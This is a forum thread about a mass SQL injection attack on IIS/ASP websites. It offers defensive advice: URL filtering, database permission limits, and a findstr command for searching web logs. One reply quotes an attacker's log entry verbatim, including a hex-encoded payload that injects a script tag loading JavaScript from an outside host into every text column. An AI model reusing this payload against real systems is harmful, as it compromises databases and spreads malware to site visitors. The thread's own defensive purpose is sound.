Sorry ladies, he’s taken.

I’m not sure about your configuration but there are a couple of things you can do.

There are some ISAPI filters that work pretty well as well as some ISAPI rewrite freeware that works too. The problem is it usually hits a maximum string issue issue. The DLL won’t parse anything after a set limit.

Are the public sites load balanced? You could use a load balancer rule to parse out a URL with the key words in it and dev null it. (EXEC DECLARE, etc.)

I did go through more of the code and it is an exploit that uses some yahoo instant messenger exploits and attempt to drop off a backdoor trojan, so its not good stuff.

The other alternative would be to disallow select access from the account that the web server uses to connect to SQL to select from syscolumns or sysobjects.

Can you post any more specifics about your web app.

We keep cleaning things up and while we’re in the middle of updating our SQL security (more stringent data typing and validation, CAPTCHA features on our contact forms, et al) the injection keeps happening. Other than updating security approaches with our code as much as possible, are there any additional immediate steps that can be taken to ward this particular injection off? We’ve been having to restore our databases just about every day for the last 3 or 4 days while trying to get code cleaned up and tighten security and also find more articles on this. Just thought I’d check.

Thank you!!
- Tony

In iis there should be a site identifier that will help you to locate which site it is.

From the root of the web logs issue this command:
(this will search todays logs.. its its yesterday search then)

findstr /s /i /n /c:”declare” ex080807.log >> sql_inj_sites_080807.txt

This will check all recursive sub-folders for the word declare.

If you check that text file you probably have something that looks like this:

W3SVC12345678\ex080807.log:99:2008-08-07 12:57:12 W3SVC12345678 MY-WEBSERVER-HOSTNAME 67.42.4.85 GET /index.asp?topic=4;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 200

I truncated some of the rest of the stuff because its not important.. EXCEPT for the http return code

200 is ofcourse OK which means the webserver processes the request.

So a query string in index.asp located in the following website: W3SVC12345678.

You can find out which site that is by going into inetmgr and looking in the site identifier field.

If you are also a little more curious you can find the SQL code that is being injected by translating the hex after the 0x and before the %20AS% into ascii and that will give you the SQL code being used.

Hope that helps.
Davis

Take a look at this: http://www.codeplex.com/IIS6SQLInjection

If there is too many factors too lock down in the code. If you are still having problems I can show you some IIS log parsers or search values to locate which pages are being hit.

davis